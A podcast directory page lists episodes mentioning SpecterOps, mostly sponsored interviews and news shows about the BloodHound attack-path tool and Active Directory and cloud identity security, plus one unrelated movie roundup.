Podcasts about specter ops

  • 65 podcasts
  • 101 episodes
  • 1h 3m average duration
  • 1 new episode per month
  • Latest episode: Jan 18, 2026



Latest podcast episodes about specter ops

Risky Business News
Sponsored: Seeing into the seams

Jan 18, 2026 (14:25)


In this Risky Business sponsored interview, Tom Uren talks to Justin Kohler, Chief Product Officer at SpecterOps, about how attack paths exist in the seams between different identity or permissions management domains. In isolation, for example, both your GitHub and your AWS deployment could follow best practices. But bring them together and you've got problems. BloodHound's OpenGraph lets you find and fix these otherwise invisible attack paths.

Risky Business
Risky Biz Soap Box: Graph the planet!

Dec 11, 2025 (42:53)


In this sponsored Soap Box edition of the Risky Business podcast, Patrick Gray chats with Jared Atkinson, CTO of SpecterOps, about BloodHound OpenGraph. OpenGraph enumerates attack paths across platforms and services, not just your primary directories. A compromised GitHub account to on-prem AD compromise attack path? It's a thing, and OpenGraph will find it. Cross-platform attack path enumeration! So good! This episode is also available on YouTube.

Pick Up and Deliver
July / August 2025 Movie Roundup

Oct 24, 2025 (17:06)


Brendan talks about the movies he watched in July and August of 2025. Join us, won't you?

JULY 2025
  • Trainwreck: Poop Cruise (2025)
  • Perseverance: Castaway Chronicles – Episodes 1 & 2 (2022)
  • Perseverance: Castaway Chronicles – Episodes 3 & 4 (2025)
  • This Is Spinal Tap (1984)
  • This Game Goes to Eleven (2018)
  • Rock Hard: 1977 (2024)

AUGUST 2025
  • Most Dangerous Game (2020)
  • Specter Ops (2015)
  • Beast (2023)
  • The Wicker Man (1973)
  • “The Festival” by H.P. Lovecraft
  • Arkham Horror: The Card Game – The Feast of Hemlock Vale: Campaign Expansion (2024)
  • Deep Cover (2025)
  • Fiasco
  • KPop Demon Hunters (2025)
  • Free Radicals (2022)
  • Dante's Peak (1997)
  • The Downfall of Pompeii (2004)

Have you seen these films? What do you think of them? What did you watch in July and August? Share your thoughts over on boardgamegeek in guild #3269.

Rattlebox Games- Network Feed
July / August 2025 Movie Roundup

Oct 24, 2025 (17:06)

PolySécure Podcast
Teknik - BloodHound and OpenGraph - Because... it's episode 0x640!

Oct 7, 2025 (34:28)


Because… it's episode 0x640!

Shameless plug
  • October 12 to 17, 2025 - Objective by the sea v8
  • October 14 and 15, 2025 - ATT&CKcon 6.0
  • October 14 and 15, 2025 - Forum inCyber Canada (30% discount code: CA25KDUX92)
  • November 4 and 5, 2025 - FAIRCON 2025
  • November 8 and 9, 2025 - DEATHcon
  • November 17 to 20, 2025 - European Cyber Week
  • February 25 and 26, 2026 - SéQCure 2026

Description

Introduction and professional background

Mathieu Saulnier, known by the handle “Scooby” in the cybersecurity community, has about twenty years of experience in the field. His career took him from a large internet and telecommunications provider to managing a SOC (Security Operations Center), then to threat research roles for SIEM and EDR vendors. Today he is the product manager for BloodHound Community Edition at SpecterOps, a position he earned through his many presentations on BloodHound over the years.

BloodHound version 8 and the OpenGraph revolution

Version 8 of BloodHound is a major evolution of the tool. The flagship feature is OpenGraph, which makes it possible to ingest any type of data into the graph and to create your own attack paths for different technologies. Historically, BloodHound focused exclusively on Active Directory and Azure/Entra ID, but that limitation is now a thing of the past. With the launch of OpenGraph, SpecterOps published several new collectors for various technologies: 1Password, Snowflake, and Jamf (for managing Mac workstations). The community responded enthusiastically: within only 48 hours of the announcement, an external contributor created a collector for Ansible. More recently, a collector for VMware vCenter and ESXi has also appeared, demonstrating the rapid adoption of this new capability.

The fundamental distinction: access path versus attack path

Mathieu uses an illuminating analogy with Google Maps to explain the difference between an access path and an attack path. Google Maps shows the permitted routes for different modes of transport (car, bicycle, public transit), each with its own rules and restrictions. That is the equivalent of an access graph, which shows where you are allowed to go. An attack path, by contrast, represents the perspective of an adversary who does not care about the rules. The example given is a car driving on a bike path in Montréal: it is forbidden, you know you risk a ticket, but it is technically possible. In the digital world the consequences are often less immediate and less visible, which explains why attackers regularly exploit these unconventional paths.

The evolution of the data model

BloodHound started modestly with only three types of objects (users, groups and computers) and three types of relationships (member of, admin and session). Since then, the model has been considerably enriched by research carried out by SpecterOps and other organizations. Properties such as Kerberoasting have been added, making it possible to identify objects vulnerable to this type of attack and to escalate privileges. The real power of OpenGraph lies in the ability to link different systems together. For example, if an attacker compromises the workstation of a user who has access to a GitHub repository, they can steal the tokens and sessions to make commits in that user's name, potentially in a widely used library, opening the way to a supply chain attack. This multi-dimensional interconnection of systems was hard to picture mentally, but the graph makes it obvious.

Creating OpenGraph collectors: requirements and good practices

For a collector to be accepted into the official list of community projects, certain standards must be met. The connector must be created with documentation detailing the minimum permissions required (principle of least privilege), explaining how it works, the supported operating systems, and the required dependencies. The documentation should also include references on how to exploit or defend against the vulnerabilities identified. Although not mandatory, custom visual elements (icons and colors) are strongly recommended to ensure visual consistency across the community. Because the project is open source, users can always modify these elements to suit their preferences. A crucial aspect is providing pre-built Cypher queries. Without these queries, a user who does not know Cypher could import all the data but then be stuck when trying to use it effectively.

The Cypher language and access to the data

BloodHound runs on a graph database, historically Neo4j, but now also PostgreSQL thanks to a conversion module. The query language used is Cypher, which has a distinctive syntax. To make the tool more accessible, SpecterOps maintains a Cypher library containing many queries created by the team and the community. These queries can be run directly from the BloodHound portal. The company is also exploring the use of LLMs (Large Language Models) to generate Cypher queries automatically, although the public corpus of BloodHound-specific data is still limited. Future avenues include the use of MCP (Model Context Protocol) and agentic approaches to improve query generation.

Defensive and offensive use: two sides of the same coin

Mathieu stresses that the same Cypher queries can serve both blue teams (defensive) and red teams (offensive). The difference lies in the intent and in how the results are used, not in the tools themselves. It is like a hammer, which can build or destroy depending on who holds it. For defensive use, BloodHound Enterprise offers advanced features such as near-continuous scanning, automatic identification of critical choke points, and remediation tools. Even the free community version makes it possible to discover major vulnerabilities on the first run.

Concrete examples and use cases

Mathieu shares striking examples of discoveries made with BloodHound. In a company of more than 60,000 employees, he identified a server where all domain users had accidentally been configured as local administrators. Because a domain administrator account regularly logged on to that server, any user could become a domain administrator in only three steps: RDP to the server, a memory dump to retrieve the token, then a pass-the-hash attack. Another recent case involved a domain administrator's login script stored in a directory that was writable by everyone. By placing a simple script there that displayed a popup, the security team quickly received a notification proving the vulnerability.

New features: the table view

Although less spectacular than OpenGraph, the “table view” feature meets an important need. The famous quote from John Lambert of Microsoft (2015) says: “Attackers think in graphs, defenders think in lists. As long as that is true, attackers will win.” Although graph visualization is BloodHound's central paradigm, some analyses require a tabular view. For example, a query identifying all Kerberoastable accounts returns many points on the screen, but without detailed information about privileges or group membership. The table view lets you choose which columns to display and export the data as JSON (and soon as CSV), making analysis and information sharing easier.

Deathcon Montréal: the conference for defenders

Alongside his work on BloodHound, Mathieu is the Montréal site leader for Deathcon (Detection Engineering and Threat Hunting Conference). This unique conference, focused entirely on hands-on workshops, takes place over two days in November. Unlike traditional conferences, all the workshops are pre-recorded, allowing participants to work at their own pace. The event is deliberately limited to a maximum of 50 people to keep a human atmosphere and encourage interaction. Participants have access to a massive lab including Splunk, Elastic, Sentinel and Security Onion, and keep that access for at least one month after the event. With no sponsors, the conference is funded entirely by ticket sales, and the 2024 edition has already sold more than 30 seats, with many participants from the previous year returning.

Conclusion

BloodHound with OpenGraph represents a major evolution in the visualization and analysis of attack paths in cybersecurity. By allowing multiple technologies beyond Active Directory to be integrated, the tool now offers a holistic view of organizational vulnerabilities. Whether for defense or for penetration testing, BloodHound continues to demonstrate that thinking in graphs rather than in lists is a decisive strategic advantage in security.

Contributors
  • Nicolas-Loïc Fortin
  • Mathieu Saulnier

Credits
  • Editing by Intrasecure inc
  • Physical venue provided by Bsides Montréal

Risky Business News
Sponsored: SpecterOps on identities at rest and identities in transit

Sep 21, 2025 (19:19)


In this Risky Business News sponsor interview, Catalin Cimpanu talks with Jared Atkinson, CTO at SpecterOps. They discuss how SpecterOps is classifying identities under two categories, identities at rest and identities in transit, what they are and how they should be treated differently.

Show notes
  • Shifting the Paradigm: Managing Identities at Rest vs. Identities in Transit
  • BloodHound OpenGraph

The Cybersecurity Defenders Podcast
#243 - Defender Fridays: Detection prioritization via the BloodHound attack graph with Jared Atkinson, CTO at SpecterOps

Aug 29, 2025 (33:16)


Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound.

Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared led incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics, Uproot, and maintains a DFIR focused blog at www.invoke-ir.com.

On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.

Join the live discussions by registering at https://limacharlie.io/defender-fridays

Risky Business
Risky Business #802 -- Accessing internal Microsoft apps with your Hotmail creds

Aug 13, 2025 (60:00)


On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including:
  • CISA warns about the path from on-prem Exchange to the cloud
  • Microsoft awards a crisp zero dollar bill for a report about what a mess its internal Entra-authed apps are
  • Everyone and their dog seems to have a shell in US Federal Court information systems
  • Google pays $250k for a Chrome sandbox escape
  • Attackers use JavaScript in adult SVG files to … farm Facebook likes?!
  • SonicWall says users aren't getting hacked with an 0day… this time.

This week's episode is sponsored by SpecterOps. Chief product officer Justin Kohler talks about how the flagship BloodHound tool has evolved to map attack paths anywhere. Bring your own applications, directories and systems into the graph, and join the identity attacks together.

This episode is also available on YouTube.

Show notes
  • CISA, Microsoft issue alerts on ‘high-severity' Exchange vulnerability | The Record from Recorded Future News
  • Advanced Active Directory to Entra ID lateral movement techniques
  • Consent & Compromise: Abusing Entra OAuth for Fun and Access to Internal Microsoft Applications
  • Cartels may be able to target witnesses after major court hack
  • Federal judiciary tightens digital security as it deals with ‘escalated cyberattacks' | The Record from Recorded Future News
  • Citrix NetScaler flaws lead to critical infrastructure breaches | Cybersecurity Dive
  • DARPA touts value of AI-powered vulnerability detection as it announces competition winners | Cybersecurity Dive
  • Buttercup is now open-source!
  • HTTP/1.1 must die: the desync endgame
  • US confirms takedown of BlackSuit ransomware gang that racked up $370 million in ransoms | The Record from Recorded Future News
  • North Korean cyber-espionage group ScarCruft adds ransomware in recent attack | The Record from Recorded Future News
  • Adult sites are stashing exploit code inside racy .svg files - Ars Technica
  • Google pays 250k for Chromium sandbox escape
  • SonicWall says recent attack wave involved previously disclosed flaw, not zero-day | Cybersecurity Dive
  • Two groups exploit WinRAR flaws in separate cyber-espionage campaigns | The Record from Recorded Future News
  • Tornado Cash cofounder dodges money laundering conviction, found guilty of lesser charge | The Record from Recorded Future News
  • Hackers Hijacked Google's Gemini AI With a Poisoned Calendar Invite to Take Over a Smart Home | WIRED
  • Malware in Open VSX: These Vibes Are Off
  • How attackers are using Active Directory Federation Services to phish with legit office.com links
  • Introducing our guide to phishing detection evasion techniques
  • The State of Attack Path Management

Legacy Listens
64. The Quality of Risk: Cyber Planning for Business Transitions and Long-Term Wealth Builders ft. Jason Frank

Jun 16, 2025 (28:51)


In this episode, host Rob Wermuth is joined by Jason Frank, Chief Operating Officer at SpecterOps, to explore one of the most critical issues facing businesses today: cybersecurity. With a background in penetration testing, threat hunting, and enterprise security operations, Jason shares insights from years on the front lines of digital defense. They discuss the rise of ransomware, the impact of artificial intelligence on risk, and how zero trust models are reshaping security in a remote-first world. Jason breaks down complex topics into practical steps that business owners, especially those leading small to mid-sized companies, can act on today. From strengthening password protocols to implementing multi-factor authentication and managing identity risk, Jason offers clear, actionable advice. He also explains how tools like BloodHound can reveal vulnerabilities that often go unnoticed. Looking ahead, the conversation touches on balancing innovation with privacy, preparing the next generation of cybersecurity talent, and why an annually reviewed cyber action plan is essential to long-term business value. If you are thinking about how to better protect your organization, clients, and legacy in an increasingly digital world, this episode is filled with timely and practical guidance.

Legacy Planning - 3440 Hamilton Blvd Allentown, PA 18103 and 228 W Gay Street West Chester, PA 19380, 610-719-8600, www.legacy-online.com. Legacy Planning offers securities and advisory services through Commonwealth Financial Network®, Member FINRA/SIPC, a Registered Investment Adviser. Legacy Planning is owned by HUB International. HUB and Commonwealth are separate and unrelated entities.

Risky Business News
Sponsored: Securing identity is like building a house while blindfolded

May 18, 2025 (15:50)


In this Risky Bulletin sponsor interview, Justin Kohler, Chief Product Officer at SpecterOps, talks to Tom Uren about the impossible challenge of managing identity directory services securely. Organisations try to implement the principle of least privilege but have no idea if they have done a good job. Justin talks about approaches SpecterOps is developing to address this problem.

Risky Business
Risky Business #783 -- Evil webcam ransomwares entire Windows network

Mar 12, 2025 (63:40)


On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news with special guest Rob Joyce, a Former Special Assistant to the US President and Director of Cybersecurity for NSA. They talk through:
  • A realistic Bluetooth-proximity phishing attack against Passkeys
  • A very patient ransomware actor encrypts an entire enterprise with a puny Linux webcam processor
  • The ESP32 backdoor that is neither a door nor at the back
  • The X DDoS that Elon said was Ukraine is claimed by pro-Palestinian hacktivists
  • Years later, LastPass hackers are still emptying crypto-wallets
  • …and it turns out North Korea nailed {Safe}Wallet with a malicious docker image. Nice!

Rob Joyce recently testified to the US House Select Committee on the Chinese Communist Party, and he explains why DOGE kicking probationary employees to the curb is “devastating” for the national security staff pipeline.

This week's episode is sponsored by SpecterOps, makers of the BloodHound identity attack path mapping tool. Chief Product Officer Justin Kohler and Principal Security Researcher Lee Chagolla-Christensen discuss their pragmatic approach to disabling NTLM authentication in Active Directory using BloodHound's insight.

This episode is also available on YouTube.

Show notes
  • CVE-2024-9956 - PassKey Account Takeover in All Mobile Browsers | Tobia Righi - Security Researcher
  • Feds Link $150M Cyberheist to 2022 LastPass Hacks – Krebs on Security
  • Camera off: Akira deploys ransomware via webcam
  • Tarlogic detects a hidden feature in the mass-market ESP32 chip that could infect millions of IoT devices
  • Alleged Co-Founder of Garantex Arrested in India – Krebs on Security
  • 37K+ VMware ESXi instances vulnerable to critical zero-day | Cybersecurity Dive
  • Apple patches 0-day exploited in “extremely sophisticated attack” - Ars Technica
  • What Really Happened With the DDoS Attacks That Took Down X | WIRED
  • Eleven11bot estimates revised downward as researchers point to Mirai variant | Cybersecurity Dive
  • Previously unidentified botnet infects unpatched TP-Link Archer home routers | The Record from Recorded Future News
  • Safe.eth on X: "Investigation Updates and Community Call to Action" / X
  • How to verify Safe{Wallet} transactions on a hardware wallet | Safe{Wallet} Help Center and Support.
  • US charges Chinese nationals in cyberattacks on Treasury, dissidents and more | The Record from Recorded Future News
  • Former top NSA cyber official: Probationary firings ‘devastating' to cyber, national security | CyberScoop
  • U.S. pauses intelligence sharing with Ukraine used to target Russian forces - The Washington Post

Risky Business
Risky Business #775 -- Cl0p is back, SEC hack disclosures disappoint

Dec 18, 2024


On this week's show, Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including:
  • The SEC's cyber incident reporting isn't very exciting after all
  • China Telecom on the way to being thrown out of the US
  • The NSA/Cybercom might get two separate hats
  • The Cl0p ransomware crew are back and taking responsibility for the Cleo hacks
  • (Yet another) File upload bug in Struts makes Java admins weep
  • And much, much more.

This episode is sponsored by SpecterOps, who run a pretty top notch offsec/pentest team when they're not busy making the BloodHound Enterprise identity attack path enumeration software. SpecterOps' Robby Winchester joins to talk about how pentest has changed, and how their customers get value from their testing.

This episode is also available on YouTube.

Show notes
  • SEC cyber incident reporting rule generates 71 filings in 11 months | Cybersecurity Dive
  • US senators, green groups call for accountability over hacking of Exxon critics | Reuters
  • Biden Administration Takes First Step to Retaliate Against China Over Hack - The New York Times
  • Unfinished business for Trump: Ending the Cyber Command and NSA 'dual hat' | The Record from Recorded Future News
  • EU opens investigation into TikTok and the Romanian election – POLITICO
  • Clop ransomware claims responsibility for Cleo data theft attacks
  • CISA warns of ransomware gangs exploiting Cleo, CyberPanel bugs | The Record from Recorded Future News
  • CVE-2024-55956 | AttackerKB
  • Apache issues patches for critical Struts 2 RCE bug • The Register
  • Japanese game and anime publisher reportedly pays $3 million ransom to Russia-linked hackers | The Record from Recorded Future News
  • Israeli spyware firm Paragon acquired by US investment group, report says | Reuters
  • How Cryptocurrency Turns to Cash in Russian Banks – Krebs on Security
  • Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop
  • Russia bans Viber, claiming app facilitates terrorism and drug trafficking | The Record from Recorded Future News

Soundside
From SeaTac to the public library, high-profile hacks are plaguing the region. Why?

Sep 26, 2024 (15:10)


It's been a tough few months for many local IT departments. Last week, hackers posted a handful of files stolen from SeaTac airport on the dark web. A ransomware gang is attempting to sell a trove of stolen Port of Seattle data for 6 million dollars in Bitcoin – after the Port refused to pay up. The cyber-attack a little over a month ago snarled travel when it took down ticketing, baggage, and other SeaTac services.

But that's just the highest profile ransomware case in the Seattle area in recent months. A few weeks ago, the Highline School District canceled classes because a cyberattack had wormed its way into the local system. There was also a crippling ransomware attack on Seattle Public Libraries back in May, which put their book checkout and online systems in limbo for months.

For more on what's happening – and how organizations can protect themselves – Soundside caught up with Robby Winchester, the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.

Thank you to the supporters of KUOW, you help make this show possible! If you want to help out, go to kuow.org/donate/soundsidenotes

Soundside is a production of KUOW in Seattle, a proud member of the NPR Network.

Guests: Robby Winchester on the line. He's the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.

Related Links:
  • Hackers demand $6 million for files stolen from Seattle airport operator in cyberattack | AP News
  • Highline schools closing Monday because of cyberattack | The Seattle Times
  • Why did ransomware hackers target Seattle Public Library? – GeekWire

Cybersecurity Where You Are
Episode 101: Visualizing Attack Paths in Active Directory

Sep 18, 2024 (34:14)


In episode 101 of Cybersecurity Where You Are, Sean Atkinson is joined by Justin Kohler, Vice President of Products at SpecterOps, and Jonathan Parfait, Technical Account Manager at SpecterOps. Together, they discuss how the visualization of attack paths in Active Directory helps organizations to better contextualize risks to their enterprise security.

Here are some highlights from our episode:
  • 01:54. What Bloodhound is and how it assists organizations in assessing risks in their Active Directory environments
  • 05:08. Why have organizations look at their Active Directory environments
  • 11:15. Common vulnerabilities and misconfigurations identified by Bloodhound
  • 21:21. How organizations can best use Bloodhound as part of their cyber defensive strategy
  • 29:18. How Bloodhound is adapting to keep up with evolving Active Directory environments

Resources
  • Bloodhound Community Edition
  • Episode 62: Inside the 'Spidey Sense' of a Pentester
  • What You Need to Know About Hybrid Cloud Environments
  • Vulnerability Management Policy Template for CIS Control 7
  • CIS Benchmarks List

If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.

Risky Business
Risky Business #760 – Microsoft to make MFA mandatory

Aug 21, 2024 (64:44)


On this week's show, Patrick Gray and Adam Boileau discuss the week's security news including:
  • Microsoft did a good thing! Soon all Azure admins will require MFA
  • The three billion row National Public Data breach mess, courtesy Florida Man
  • US govt confirms that it was Iran that hacked the Trump campaign
  • Is TP-Link the next Huawei, or just not very good at computers?
  • Major Chinese RFID card maker has hardcoded backdoors
  • And much, much more.

This week's episode is sponsored by SpecterOps, makers of BloodHound Enterprise. VP of Products Justin Kohler joins to talk about how they've joined their on-prem AD and cloud Entra attack path graphs, so you can map out that juicy, real-world attack surface.

Show notes
  • Announcing mandatory multi-factor authentication for Azure sign-in | Microsoft Azure Blog
  • phishing resistant mfa - Google Search
  • Microsoft will require MFA for all Azure users
  • NationalPublicData.com Hack Exposes a Nation's Data – Krebs on Security
  • National Public Data Published Its Own Passwords – Krebs on Security
  • Bloomberg Law
  • How the government's proposed 'Trust Exchange' digital ID scheme would work - ABC News
  • German Cyber Agency Wants Changes in Microsoft, CrowdStrike Products After Tech Outage - WSJ
  • Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts — FBI
  • Crypto firm says hacker locked all employees out of Google products for four days
  • ZachXBT on X: "Seven hours ago a suspicious transfer was made from a potential victim for 4064 BTC ($238M)" / X
  • Bitcoin News Today: $238 Million Bitcoin Heist Linked to Genesis Global Trading
  • Routers from China-based TP-Link a national security threat, US lawmakers claim
  • Hardware backdoors found in Chinese smart cards
  • Unmasking Styx Stealer: How a Hacker's Slip Led to an Intelligence Treasure Trove - Check Point Research
  • Man who hacked Hawaii state registry to forge his own death certificate sentenced to 81 months

Cloud Security Podcast by Google
EP181 Detection Engineering Deep Dive: From Career Paths to Scaling SOC Teams

Jul 15, 2024 (30:32)


Guest: Zack Allen, Senior Director of Detection & Research @ Datadog, creator of Detection Engineering Weekly

Topics:
  • What are the biggest challenges facing detection engineers today?
  • What do you tell people who want to consume detections and not engineer them?
  • What advice would you give to someone who is interested in becoming a detection engineer at her organization?
  • So, what IS a detection engineer? Do you need software skills to be one? How much breadth and depth do you need?
  • What should a SOC leader whose team totally lacks such skills do?
  • You created Detection Engineering Weekly. What motivated you to start this publication, and what are your goals for it? What are the learnings so far?
  • You work for a vendor, so how should customers think of vendor-made vs customer-made detections and their balance?
  • What goes into a backlog for detections and how do you inform it?

Resources:
  • Video (LinkedIn, YouTube)
  • Zack's newsletter: https://detectionengineering.net
  • EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil
  • EP117 Can a Small Team Adopt an Engineering-Centric Approach to Cybersecurity?
  • The SRE book
  • “Detection Spectrum” blog
  • “Delivering Security at Scale: From Artisanal to Industrial” blog (and this too)
  • “Detection Engineering is Painful — and It Shouldn't Be (Part 1)” blog series
  • “Detection as Code? No, Detection as COOKING!” blog
  • “Practical Threat Detection Engineering: A hands-on guide to planning, developing, and validating detection capabilities” book
  • SpecterOps blog

Risky Business News
Sponsored: Why directory services are always a dog's breakfast

Risky Business News

Play Episode Listen Later May 26, 2024 14:35


In this Risky Business News sponsored interview, Tom Uren talks to Justin Kohler, VP of the Bloodhound team at SpecterOps about ‘attack paths', the ways that malicious actors maneuver through Active Directory to elevate their privileges. They discuss how and why they arise and what you can do about them.

Risky Business
Soap Box: A deep dive on how Russia's SVR is hacking Microsoft 365 tenants

Risky Business

Play Episode Listen Later Feb 19, 2024 39:48


The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.

Brilliance Security Magazine Podcast
The Evolution of Purple Teaming

Brilliance Security Magazine Podcast

Play Episode Listen Later Nov 13, 2023 42:14


In Season 5, Episode 19 of the BSM podcast, host Steven Bowcut welcomes Jared Atkinson, the Chief Strategist at SpecterOps and the host of the "Detection Challenging Paradigms Podcast." The episode focuses on the dynamic and increasingly important topic of purple teaming within cybersecurity.
Key Points Discussed
- Evolution of Purple Teaming: Jared delves into the progression of purple teaming practices and their significance in the current threat landscape. He emphasizes how both defensive (blue team) and offensive (red team) strategies have melded to form a more comprehensive security approach.
- Testing Landscape and Vendor Claims: The conversation touches on how the testing landscape has evolved, particularly considering vendor claims about the capabilities of their security solutions. Jared scrutinizes these claims and suggests a more measured approach to evaluating their efficacy.
- Shortcomings in Purple Team Assessments: Jared enumerates the reasons why many purple team assessments don't reach their full potential. These shortcomings often stem from a lack of realistic testing scenarios or comprehensive coverage of possible attack vectors.
- Role of New Frameworks: The introduction of new frameworks like Atomic Testing is highlighted as a game-changer in the field. Jared talks about how these frameworks can improve the precision and effectiveness of security assessments.
- Building and Selecting Test Cases: The importance of building and selecting diverse and relevant test cases is discussed. Jared underlines the necessity for organizations to cover a wide range of attack techniques in their testing protocols.
- Evolution of Attack Techniques: Examples of how attack techniques have evolved over time are provided, offering listeners insights into the adaptive nature of cyber threats.
- Analyzing Malware Samples: Jared points to SpecterOps's 10-part blog series that offers a deep dive into the technical aspects of malware sample analysis, an essential skill for modern threat hunters.
- Future of Purple Teaming: Finally, Jared presents his perspective on the direction purple teaming should take in the future. He stresses the need for continual adaptation and the adoption of forward-thinking strategies to stay ahead of threat actors.
Conclusion
The episode is informative for cybersecurity professionals looking to understand the current state and the progression of purple teaming. Jared Atkinson's expertise provides listeners with a detailed examination of the challenges and considerations essential to advancing the effectiveness of cybersecurity defenses through collaborative and realistic testing. The discussion not only sheds light on current practices but also charts a course for the future of purple teaming, making it a must-listen for those engaged in or interested in the strategic aspects of cybersecurity.

The Practical 365 Podcast
Microsoft Teams Unbundled in Europe, AD cybersecurity tips from Justin Kohler and the latest news: The Practical 365 Podcast S4 E3

The Practical 365 Podcast

Play Episode Listen Later Sep 4, 2023 65:41


On this show this week we're talking about Microsoft unbundling Microsoft Teams in response to Slack: Good or bad and how will it affect you? New features coming to Teams that are long awaited, plus Justin Kohler from SpecterOps joins us on the show to talk about his TEC conference session & give us a plethora of AD-related cybersecurity advice. Hey Practical 365 Podcast Listeners, we need your feedback! Tell us what you would like to hear about in our upcoming episodes by filling out this 1-minute survey.  Want to stay up to date on all things Practical 365? Follow us on Twitter, Facebook, and Linkedin to stay up to date on all things Microsoft!

Risky Business
Risky Biz Soap Box: Six degrees of Domain Admin

Risky Business

Play Episode Listen Later Mar 10, 2023 42:46


Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.

ITSPmagazine | Technology. Cybersecurity. Society
US Air Force Linguist Turned Security Product VP | A Conversation with Justin Kohler | The Hacker Factory Podcast With Phillip Wylie

ITSPmagazine | Technology. Cybersecurity. Society

Play Episode Listen Later Nov 4, 2022 28:39


Guest: Justin Kohler, Vice President of Products at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/
On Twitter | https://twitter.com/JustinKohler10
Host: Phillip Wylie
On ITSPmagazine

The Hacker Factory
US Air Force Linguist Turned Security Product VP | A Conversation with Justin Kohler | The Hacker Factory Podcast With Phillip Wylie

The Hacker Factory

Play Episode Listen Later Nov 4, 2022 28:39


Guest: Justin Kohler, Vice President of Products at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/
On Twitter | https://twitter.com/JustinKohler10
Host: Phillip Wylie
On ITSPmagazine

ITSPmagazine | Technology. Cybersecurity. Society
A Conversation With System Engineer Manager Stephen Hinck | The Hacker Factory Podcast With Phillip Wylie

ITSPmagazine | Technology. Cybersecurity. Society

Play Episode Listen Later Oct 28, 2022 33:40


Guest: Stephen Hinck, System Engineering Manager at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/shinck/
On Twitter | https://twitter.com/StephenHinck
Host: Phillip Wylie
On ITSPmagazine

The Hacker Factory
A Conversation With System Engineer Manager Stephen Hinck | The Hacker Factory Podcast With Phillip Wylie

The Hacker Factory

Play Episode Listen Later Oct 28, 2022 33:40


Guest: Stephen Hinck, System Engineering Manager at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/shinck/
On Twitter | https://twitter.com/StephenHinck
Host: Phillip Wylie
On ITSPmagazine

The CyberWire
CyberFront Z's failed influence operation. Iranian operators target Albanian government networks. CISA issues two ICS security advisories. CISA and ACSC issue a joint advisory on top malware strains.

The CyberWire

Play Episode Listen Later Aug 5, 2022 29:25


CyberFront Z's failed influence operation. Iranian operators target Albanian government networks. CISA issues two ICS security advisories. Andy Robbins of SpecterOps to discuss Attack Paths in Azure. Denis O'Shea of Mobile Mentor talking on the intersection of endpoint security and employee experience. CISA and ACSC issue a joint advisory on top malware strains.
For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/11/150
Selected reading.
- Quarterly Adversarial Threat Report (Meta)
- Meta took down Russian troll farm that supported country's invasion of Ukraine (The Hill)
- Russia's Infamous Troll Farm Is Back -- and Sh*tting the Bed (Rolling Stone)
- Meta's threat report highlights clumsy attempt to manipulate Ukraine discourse (TechCrunch)
- Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations (Mandiant)
- CISA Alert AA22-216A – 2021 top malware strains. (The CyberWire)
- 2021 Top Malware Strains (CISA)
- Digi ConnectPort X2D (CISA)
- Cisco Releases Security Updates for RV Series Routers (CISA)

Paul's Security Weekly
PSW #747 - Andy Robbins

Paul's Security Weekly

Play Episode Listen Later Jul 15, 2022 188:00


This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

Paul's Security Weekly (Podcast-Only)
PSW #747 - Andy Robbins

Paul's Security Weekly (Podcast-Only)

Play Episode Listen Later Jul 15, 2022 188:00


